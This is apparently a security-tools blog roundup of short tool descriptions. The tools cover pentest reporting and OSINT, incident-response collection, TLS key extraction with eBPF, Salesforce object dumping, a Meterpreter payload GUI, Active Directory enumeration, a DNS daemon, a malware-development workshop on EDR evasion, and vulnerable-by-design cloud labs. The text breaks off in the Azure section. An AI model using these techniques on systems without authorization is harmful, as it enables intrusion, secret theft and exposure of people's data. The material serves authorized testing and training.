
BlackStone - Pentesting Reporting Tool

7 August 2022 at 12:30
By: Zion3R

The BlackStone project, or "BlackStone Project", is a tool created to automate the work of drafting and submitting reports on ethical hacking or pentesting audits.

In this tool we can register in the database the vulnerabilities found during the audit, classifying them as internal, external, or WiFi, and record each one's description and recommendation as well as its severity and the effort required to fix it. This information then helps us generate a criticality table in the report as a global summary of the vulnerabilities found.

We can also register a company and, just by adding its web page, the tool will be able to find subdomains, telephone numbers, social networks, employee emails...



Docker Install

Install Docker

Install docker-compose
Install BlackStone
git clone https://github.com/micro-joan/BlackStone
cd BlackStone
docker-compose up -d

User: blackstone

Password: blackstone

Manual Install

  • First we must install an Apache server to host the tool; in my case I use MAMP (I recommend following its steps): https://www.mamp.info/en/downloads/
  • We will download the content of this repository and we will have 2 folders (BlackStone and BBDD)
  • Once the server starts, go to C:/MAMP/htdocs and paste all the contents of the downloaded "BlackStone" folder
  • For the application to work we will have to import the database: go to "localhost/phpMyAdmin/" in your browser (the database connection file is at BlackStone/conexion.php)
  • We will create a database called blackstone and import the data from the downloaded BBDD folder
  • Log in to BlackStone with the username and password "blackstone"

Use

First you need to go to profile settings and add your Hunter.io and haveibeenpwned.com API tokens.


THIS APPLICATION IS INTENDED FOR PROFESSIONAL USE ONLY; THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OF IT.

After adding vulnerabilities to the database, we go to the audited client section and register a client along with their web page. Once registered, we can open the customer details and see the following information:

  • Name of business owner
  • Social networks of the company owner
  • Email and telephone number of the owner of the company
  • Check for exposed passwords of the company owner on the deep web
  • Subdomains of the website, as well as information of interest found in Google
  • Emails of company workers


Once the company we are going to audit is registered in the database, we create a report, adding the date, the report name, and the company to be audited. After registering the report, we click edit and select the vulnerabilities that we want to appear in the report:


Finally, we generate the report by clicking the "overview report" button, save the generated page as ".mht", and then open it with Word to continue working on the generated report.





Pict - Post-Infection Collection Toolkit

6 August 2022 at 12:30
By: Zion3R


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without them.

Data will be collected in two forms. The first is summary files, containing the output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second is complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one parameter, which is required: the path to a configuration file in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:

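A minimal configuration, reconstructed from the options documented below, might look like the following (the collectors entries mirror the browser example; the exact module and class names are assumptions, so check the collectors folder for the real ones):

{
    "collection_dest": "~/pict-data",
    "all_users": true,
    "collectors": {
        "browser": "BrowserCollector"
    },
    "unused": {
        "example": "ExampleCollector"
    },
    "settings": {
        "keepLSData": false,
        "zipIt": true
    },
    "moduleSettings": {
        "browser": {
            "collectArtifacts": true
        }
    }
}
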
collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the parent Collector.__init__() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collector class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.
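
As a concrete illustration, here is a minimal sketch of a custom module built on the hooks described above (the module name, class name, and setting name are hypothetical; only the printStartInfo/applySettings/collect methods and the self.pathsToCollect mechanism come from the template contract):

# collectors/sshkeys.py - hypothetical custom module (illustrative sketch)
import os

from collectors.collector import Collector

class SSHKeysCollector(Collector):
    def printStartInfo(self):
        # Progress feedback on stdout
        print("Collecting SSH key information...")

    def applySettings(self, settingsDict):
        # Read a module-specific setting (hypothetical), then hand the dict
        # to the Collector class so it can apply the global settings it defines
        self.collectPublicKeys = settingsDict.get("collectPublicKeys", True)
        Collector.applySettings(self, settingsDict)

    def collect(self):
        # Write a summary file into self.collectionPath, using a filename
        # that no other module uses
        sshDir = os.path.expanduser("~/.ssh")
        summaryPath = os.path.join(self.collectionPath, "ssh_keys.txt")
        with open(summaryPath, "w") as out:
            if os.path.isdir(sshDir):
                for name in sorted(os.listdir(sshDir)):
                    out.write(name + "\n")
                    if getattr(self, "collectPublicKeys", True) and name.endswith(".pub"):
                        # Queue public keys as artifacts; the Collector class
                        # copies them and preserves their metadata
                        self.pathsToCollect.append(os.path.join(sshDir, name))
        # Let the Collector class collect the queued artifacts
        Collector.collect(self)

It would be enabled by adding a "sshkeys": "SSHKeysCollector" entry to the collectors dictionary in the configuration file.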

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



Peetch - An eBPF Playground

5 August 2022 at 12:30
By: Zion3R


peetch is a collection of tools aimed at experimenting with different aspects of eBPF to bypass TLS protocol protections.

Currently, peetch includes two subcommands. The first, called dump, aims to sniff network traffic, associating information about the source process with each packet. The second, called tls, allows identifying processes that use OpenSSL and extracting their cryptographic keys.

Combined, these two commands make it possible to decrypt TLS exchanges recorded in the PCAPng format.


Installation

peetch relies on several dependencies, including non-merged modifications of bcc and Scapy. A Docker image can be built to easily test peetch, using the following command:

docker build -t quarkslab/peetch .

Commands Walk Through

The following examples assume that you used the following command to enter the Docker image and launch examples within it:

docker run --privileged --network host --mount type=bind,source=/sys,target=/sys --mount type=bind,source=/proc,target=/proc --rm -it quarkslab/peetch

dump

This sub-command gives you the ability to sniff packets using an eBPF TC classifier and to retrieve the corresponding PID and process names with:

peetch dump
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https S / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 SA / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https A / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https PA / Raw / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 A / Padding

Note that for demonstration purposes, dump will only capture IPv4 based TCP segments.

For convenience, the captured packets can be stored to a PCAPng file along with process information using --write:

peetch dump --write peetch.pcapng
^C

This PCAPng can easily be manipulated with Wireshark or Scapy:

scapy
>>> l = rdpcap("peetch.pcapng")
>>> l[0]
<Ether dst=00:1c:42:00:00:18 src=00:1c:42:54:f3:34 type=IPv4 |<IP version=4 ihl=5 tos=0x0 len=60 id=11088 flags=DF frag=0 ttl=64 proto=tcp chksum=0x4bb1 src=10.211.55.10 dst=208.97.177.124 |<TCP sport=53054 dport=https seq=631406526 ack=0 dataofs=10 reserved=0 flags=S window=64240 chksum=0xc3e9 urgptr=0 options=[('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1272423534, 0)), ('NOP', None), ('WScale', 7)] |<Padding load='\x00\x00' |>>>>
>>> l[0].comment
b'curl/1289909'

tls

This sub-command aims at identifying processes that use OpenSSL and makes it possible to dump several things, like plaintext and secrets.

By default, peetch tls will only display one line per process; the --directions argument makes it possible to display the exchanged messages:

peetch tls --directions
<- curl (1291078) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256
-> curl (1291078) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

Displaying OpenSSL buffer content is achieved with --content.

peetch tls --content
<- curl (1290608) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

0000 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
0010 48 6F 73 74 3A 20 77 77 77 2E 70 65 72 64 75 2E Host: www.perdu.
0020 63 6F 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A com..User-Agent:
0030 20 63 75 72 6C 2F 37 2E 36 38 2E 30 0D 0A 41 63 curl/7.68.0..Ac

-> curl (1290608) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

0000 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
0010 0A 44 61 74 65 3A 20 54 68 75 2C 20 31 39 20 4D .Date: Thu, 19 M
0020 61 79 20 32 30 32 32 20 31 38 3A 31 36 3A 30 31 ay 2022 18:16:01
0030 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap

The --secrets argument will display TLS Master Secrets extracted from memory. The following example leverages --write to write master secrets to disk, to simplify decrypting TLS messages with Scapy:

$ (sleep 5; curl https://www.perdu.com/?name=highly%20secret%20information --tls-max 1.2 --http1.1) &

# peetch tls --write &
curl (1293232) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

# peetch dump --write traffic.pcapng
^C

# Add the master secret to a PCAPng file
$ editcap --inject-secrets tls,1293232-master_secret.log traffic.pcapng traffic-ms.pcapng

$ scapy
>>> load_layer("tls")
>>> conf.tls_session_enable = True
>>> l = rdpcap("traffic-ms.pcapng")
>>> l[13][TLS].msg
[<TLSApplicationData data='GET /?name=highly%20secret%20information HTTP/1.1\r\nHost: www.perdu.com\r\nUser-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n' |>]

Limitations

By design, peetch only supports OpenSSL and TLS 1.2.



Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go

4 August 2022 at 12:30
By: Zion3R


A fast tool to scan SaaS and PaaS apps, written in Go.

SaaS App Support:

  • salesforce
  • contentful (next version)

Note: the -o output flag is not working.

Install (requires Go 1.18):

go install -v github.com/Ph33rr/cirrusgo/cmd/cirrusgo@latest
or
go install -v github.com/Ph33rr/CirrusGo/cmd/cirrusgo@latest


Help:

cirrusgo --help
  ______ _                           ______
/ ____/(_)_____ _____ __ __ _____ / ____/____
/ / / // ___// ___// / / // ___// / __ / __ \
/ /___ / // / / / / /_/ /(__ )/ /_/ // /_/ /
\____//_//_/ /_/ \__,_//____/ \____/ \____/ v0.0.1

cirrusgo --help

-u, --url <URL> Define single URL to fuzz
-l, --list Show App List
-c, --check only check endpoint
-V, --version Show current version
-h, --help Display its help

[cirrusgo [app] [options] ..]
cirrusgo salesforce --help

-u, --url <URL> Define single URL
-c, --check only check endpoint
-lobj, --listobj pull the object list.
-gobj --getobj pull the object.
-obj --objects set the object name. Default value is "User" object.
Juicy Objects: Case,Account,User,Contact,Document,ContentDocument,
ContentVersion,ContentBody,CaseComment,Note,Employee,Attachment,
EmailMessage,CaseExternalDocument,Attachment,Lead,Name,EmailTemplate,
EmailMessageRelation
-gre --getrecord pull the Record id.
-re --recordid set the record id to dump the record
-cw --chkWritable check all Writable objects
-f, --full dump all pages of objects.
--dump
-H, --header <HEADER> Pass custom header to target
-proxy, --proxy <URL> Use proxy to fuzz

-o, --output <FILE> File to save results

[flags payload]
[command: cirrusgo salesforce --payload options]
-payload, --payload Generator payload for test manual Default "ObjectList"

GetItems -obj set object
-page set page
-pages set pageSize
GetRecord -re set recoder id
WritableOBJ -obj set object
SearchObj -obj set object
-page set page
-pages set pageSize
AuraContext -fwuid set UID
-App set AppName
-markup set markup
ObjectList no options
Dump no options
-h, --help Display its help

Example :

cirrusgo salesforce -u https://localhost -gobj

dump:

cirrusgo salesforce -u https://localhost/ -f

check Writable Objects:

cirrusgo salesforce -u https://localhost/ -cw



Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler

3 August 2022 at 12:30
By: Zion3R

Kage (ka-geh) is a tool inspired by AhMyth, designed for the Metasploit RPC server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter.


Getting Started

Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites

Installing

You can install Kage binaries from here.

for developers

to run the app from source code:

# Download source code
git clone https://github.com/WayzDev/Kage.git

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

To generate an APK payload, select the Raw format in the dropdown list.

Screenshots







Disclaimer

I will not be responsible for any direct or indirect damage caused by the usage of this tool; it is for educational purposes only.

Twitter: @iFalah

Email: [email protected]

Credits

Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)
http://www.metasploit.com/

node-msfrpc - (c) Tomas Gonzalez Vivo. 2017 (Apache License)
https://github.com/tomasgvivo/node-msfrpc

electron-vue - (c) Greg Holguin. 2016 (MIT)
https://github.com/SimulatedGREG/electron-vue


This project was generated with electron-vue using vue-cli. Documentation about the original structure can be found here.



SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.

1 August 2022 at 12:30
By: Zion3R


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP password - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.
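
For example, an authenticated enumeration against a domain controller with all output flags enabled might look like this (all values are illustrative):

pipenv run python silenthound.py -u 'bob dole' -p 'Password123' -o acme -g -n -k 10.0.0.1 ACME.com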

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.

Using the -o flag will result in output files for each section normally shown in stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r--  1 kali  kali    60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r--  1 kali  kali  2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r--  1 kali  kali    89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r--  1 kali  kali  1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r--  1 kali  kali    66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r--  1 kali  kali   529 Jun 30 11:37 BASENAME-users.txt

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



PR-DNSd - Passive-Recursive DNS Daemon

1 August 2022 at 02:09
By: Zion3R


Passive-Recursive DNS daemon.


Quickstart

go get github.com/korc/PR-DNSd
sudo setcap cap_net_bind_service,cap_sys_chroot=ep go/bin/PR-DNSd
go/bin/PR-DNSd -upstream 9.9.9.9:53 -listen 127.0.0.1:53
echo nameserver 127.0.0.1 | sudo tee /etc/resolv.conf
dig google.com
dig -x $(dig +short google.com)

If you can't use setcap, you have to use -chroot "" and -listen :<high_port> options, or run as root.

Use cases

  • run as local host DNS service, to fix your netstat/tcpview/lsof etc. output
  • as enterprise-internal DNS server, to also be able to do meaningful EDR/IR and log analysis
  • as cloud service, to also collect Passive DNS data from non-enterprise (home, BYOD etc.) devices
    • hint: you probably want to configure DDoS protection options
  • in cloud as DNS-over-TLS server, to additionally provide private DNS for supporting devices (ex: Android 9's private DNS setting)
    • ex: domain pattern based firewall/proxy configuration for mobile devices

Running as your own private server for Android 9's Private DNS settings

After appropriate setcap, run:

PR-DNSd -tlslisten :853 -cert YOUR_SERVER_CRT_KEY_PEM -upstream 1.1.1.1:53 -store pr-dnsd

Options

-cert string
      TCP-TLS listener certificate (required for tls listener)
-chroot string
      chroot to directory after start (default "/var/tmp")
-count int
      Count of replies allowed before debounce delay is applied (default 100)
-ctmout string
      Client timeout for upstream queries
-debounce string
      Required time duration between UDP replies to single IP to prevent DoS (default "200ms")
-key string
      TCP-TLS certificate key (default same as -cert value)
-listen string
      listen address (default ":53")
-silent
      Don't report normal data
-store string
      Store PTR data to specified file
-tlslisten string
      TCP-TLS listener address (default ":853")
-upstream string
      upstream DNS server (tcp-tls:// prefix for DoT) (default "1.1.1.1:53")

(with tls and chroot, ensure ca-certificates and resolv.conf in chroot are properly set up)


Maldev-For-Dummies - A Workshop About Malware Development

29 July 2022 at 12:30
By: Zion3R


In the age of EDR, red team operators cannot get away with using pre-compiled payloads anymore. As such, malware development is becoming a vital skill for any operator. Getting started with maldev may seem daunting, but is actually very easy. This workshop will show you all you need to get started!

This repository contains the slides and accompanying exercises for the 'MalDev for Dummies' workshop that will be facilitated at Hack in Paris 2022 (additional conferences TBA). The exercises will remain available here to be completed at your own pace - the learning process should never be rushed! Issues and pull requests to this repo with questions and/or suggestions are welcomed.

Disclaimer: Malware development is a skill that can -and should- be used for good, to further the field of (offensive) security and keep our defenses sharp. If you ever use this skillset to perform activities that you have no authorization for, you are a bigger dummy than this workshop is intended for and you should skidaddle on out of here.


Workshop Description

With antivirus (AV) and Enterprise Detection and Response (EDR) tooling becoming more mature by the minute, the red team is being forced to stay ahead of the curve. Gone are the times of execute-assembly and dropping unmodified payloads on disk - if you want your engagements to last longer than a week you will have to step up your payload creation and malware development game. Starting out in this field can be daunting however, and finding the right resources is not always easy.

This workshop is aimed at beginners in the space and will guide you through your first steps as a malware developer. It is aimed primarily at offensive practitioners, but defensive practitioners are also very welcome to attend and broaden their skillset.

During the workshop we will go over some theory, after which we will set you up with a lab environment. There will be various exercises that you can complete depending on your current skillset and level of comfort with the subject. However, the aim of the workshop is to learn, and explicitly not to complete all the exercises. You are free to choose your preferred programming language for malware development, but support during the workshop is provided primarily for the C# and Nim programming languages.

During the workshop, we will discuss the key topics required to get started with building your own malware. This includes (but is not limited to):

  • The Windows API
  • Filetypes and execution methods
  • Shellcode execution and injection
  • AV and EDR evasion methods

Getting Started

To get started with malware development, you will need a dev machine so that you are not bothered by any defensive tooling that may run on your host machine. I prefer Windows for development, but Linux or MacOS will do just as fine. Install your IDE of choice (I use VS Code for almost everything except C#, for which I use Visual Studio), and then install the toolchains required for your MalDev language of choice:

  • C#: Visual Studio will give you the option to include the .NET packages you will need to develop C#. If you want to develop without Visual Studio, you can download the .NET Framework separately.
  • Nim lang: Follow the download instructions. Choosenim is a convenient utility that can be used to automate the installation process.
  • Golang (not supported during workshop): Follow the download instructions.
  • Rust (not supported during workshop): Rustup can be used to install Rust along with the required toolchains.

Don't forget to disable Windows Defender or add the appropriate exclusions, so your hard work doesn't get quarantined!

β„Ή
Note: Oftentimes, package managers such as apt or software management tools such as Chocolatey can be used to automate the installation and management of dependencies in a convenient and repeatable way. Be conscious however that versions in package managers are often behind on the real thing! Below is an example Chocolatey command to install the mentioned tooling all at once.
 choco install -y nim choosenim go rust vscode visualstudio2019community dotnetfx

Compiling programs

Both C# and Nim are compiled languages, meaning that a compiler is used to translate your source code into binary executables of your chosen format. The process of compilation differs per language.

C#

C# code (.cs files) can either be compiled directly (with the csc utility) or via Visual Studio itself. Most source code in this repo (except the solution to bonus exercise 3) can be compiled as follows.

β„Ή
Note: Make sure you run the below command in a "Visual Studio Developer Command Prompt" so it knows where to find csc, it is recommended to use the "x64 Native Tools Command Prompt" for your version of Visual Studio.
csc filename.cs /unsafe

You can enable compile-time optimizations with the /optimize flag. You can hide the console window by adding /target:winexe as well, or compile as DLL with /target:library (but make sure your code structure is suitable for this).
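
For example, an optimized build without a console window, using the flags just mentioned (filename.cs is a placeholder source file):

csc /optimize /target:winexe filename.cs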

Nim

Nim code (.nim files) is compiled with the nim c command. The source code in this repo can be compiled as follows.

nim c filename.nim

If you want to optimize your build for size and strip debug information (much better for opsec!), you can add the following flags.

nim c -d:release -d:strip --opt:size filename.nim

Optionally you can hide the console window by adding --app:gui as well.
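
Putting the above together, a size-optimized release build without a console window looks like this:

nim c -d:release -d:strip --opt:size --app:gui filename.nim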

Dependencies

Nim

Most Nim programs depend on a library called "Winim" to interface with the Windows API. You can install the library with the Nimble package manager as follows (after installing Nim):

nimble install winim

Resources

The workshop slides reference some resources that you can use to get started. Additional resources are listed in the README.md files for every exercise!



TerraformGoat - "Vulnerable By Design" Multi Cloud Deployment Tool

28 July 2022 at 12:30
By: Zion3R


TerraformGoat is selefra research lab's "Vulnerable by Design" multi cloud deployment tool.

Currently supported cloud vendors include Alibaba Cloud, Tencent Cloud, Huawei Cloud, Amazon Web Services, Google Cloud Platform, Microsoft Azure.


Scenarios

ID | Cloud Service Company | Types Of Cloud Services | Vulnerable Environment
1 | Alibaba Cloud | Networking | VPC Security Group Open All Ports
2 | Alibaba Cloud | Networking | VPC Security Group Open Common Ports
3 | Alibaba Cloud | Object Storage | Bucket HTTP Enable
4 | Alibaba Cloud | Object Storage | Object ACL Writable
5 | Alibaba Cloud | Object Storage | Object ACL Readable
6 | Alibaba Cloud | Object Storage | Special Bucket Policy
7 | Alibaba Cloud | Object Storage | Bucket Public Access
8 | Alibaba Cloud | Object Storage | Object Public Access
9 | Alibaba Cloud | Object Storage | Bucket Logging Disable
10 | Alibaba Cloud | Object Storage | Bucket Policy Readable
11 | Alibaba Cloud | Object Storage | Bucket Object Traversal
12 | Alibaba Cloud | Object Storage | Unrestricted File Upload
13 | Alibaba Cloud | Object Storage | Server Side Encryption No KMS Set
14 | Alibaba Cloud | Object Storage | Server Side Encryption Not Using BYOK
15 | Alibaba Cloud | Elastic Computing Service | ECS SSRF
16 | Alibaba Cloud | Elastic Computing Service | ECS Unattached Disks Are Unencrypted
17 | Alibaba Cloud | Elastic Computing Service | ECS Virtual Machine Disks Are Unencrypted
18 | Tencent Cloud | Networking | VPC Security Group Open All Ports
19 | Tencent Cloud | Networking | VPC Security Group Open Common Ports
20 | Tencent Cloud | Object Storage | Bucket ACL Writable
21 | Tencent Cloud | Object Storage | Bucket ACL Readable
22 | Tencent Cloud | Object Storage | Bucket Public Access
23 | Tencent Cloud | Object Storage | Object Public Access
24 | Tencent Cloud | Object Storage | Unrestricted File Upload
25 | Tencent Cloud | Object Storage | Bucket Object Traversal
26 | Tencent Cloud | Object Storage | Bucket Logging Disable
27 | Tencent Cloud | Object Storage | Server Side Encryption Disable
28 | Tencent Cloud | Elastic Computing Service | CVM SSRF
29 | Tencent Cloud | Elastic Computing Service | CBS Storage Are Not Used
30 | Tencent Cloud | Elastic Computing Service | CVM Virtual Machine Disks Are Unencrypted
31 | Huawei Cloud | Networking | ECS Unsafe Security Group
32 | Huawei Cloud | Object Storage | Object ACL Writable
33 | Huawei Cloud | Object Storage | Special Bucket Policy
34 | Huawei Cloud | Object Storage | Unrestricted File Upload
35 | Huawei Cloud | Object Storage | Bucket Object Traversal
36 | Huawei Cloud | Object Storage | Wrong Policy Causes Arbitrary File Uploads
37 | Huawei Cloud | Elastic Computing Service | ECS SSRF
38 | Huawei Cloud | Relational Database Service | RDS Mysql Baseline Checking Environment
39 | Amazon Web Services | Networking | VPC Security Group Open All Ports
40 | Amazon Web Services | Networking | VPC Security Group Open Common Ports
41 | Amazon Web Services | Object Storage | Object ACL Writable
42 | Amazon Web Services | Object Storage | Bucket ACL Writable
43 | Amazon Web Services | Object Storage | Bucket ACL Readable
44 | Amazon Web Services | Object Storage | MFA Delete Is Disable
45 | Amazon Web Services | Object Storage | Special Bucket Policy
46 | Amazon Web Services | Object Storage | Bucket Object Traversal
47 | Amazon Web Services | Object Storage | Unrestricted File Upload
48 | Amazon Web Services | Object Storage | Bucket Logging Disable
49 | Amazon Web Services | Object Storage | Bucket Allow HTTP Access
50 | Amazon Web Services | Object Storage | Bucket Default Encryption Disable
51 | Amazon Web Services | Elastic Computing Service | EC2 SSRF
52 | Amazon Web Services | Elastic Computing Service | Console Takeover
53 | Amazon Web Services | Elastic Computing Service | EBS Volumes Are Not Used
54 | Amazon Web Services | Elastic Computing Service | EBS Volumes Encryption Is Disabled
55 | Amazon Web Services | Elastic Computing Service | Snapshots Of EBS Volumes Are Unencrypted
56 | Amazon Web Services | Identity and Access Management | IAM Privilege Escalation
57 | Google Cloud Platform | Object Storage | Object ACL Writable
58 | Google Cloud Platform | Object Storage | Bucket ACL Writable
59 | Google Cloud Platform | Object Storage | Bucket Object Traversal
60 | Google Cloud Platform | Object Storage | Unrestricted File Upload
61 | Google Cloud Platform | Elastic Computing Service | VM Command Execution
62 | Microsoft Azure | Object Storage | Blob Public Access
63 | Microsoft Azure | Object Storage | Container Blob Traversal
64 | Microsoft Azure | Elastic Computing Service | VM Command Execution


Install

TerraformGoat is deployed using Docker images and therefore requires Docker Engine; installation instructions can be found at https://docs.docker.com/engine/install/

Depending on the cloud service provider you are using, choose the corresponding installation command.

Alibaba Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash

Tencent Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker run -itd --name terraformgoat_tencentcloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker exec -it terraformgoat_tencentcloud_0.0.4 /bin/bash

Huawei Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker run -itd --name terraformgoat_huaweicloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker exec -it terraformgoat_huaweicloud_0.0.4 /bin/bash

Amazon Web Services

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker run -itd --name terraformgoat_aws_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker exec -it terraformgoat_aws_0.0.4 /bin/bash

Google Cloud Platform

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker run -itd --name terraformgoat_gcp_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker exec -it terraformgoat_gcp_0.0.4 /bin/bash

Microsoft Azure

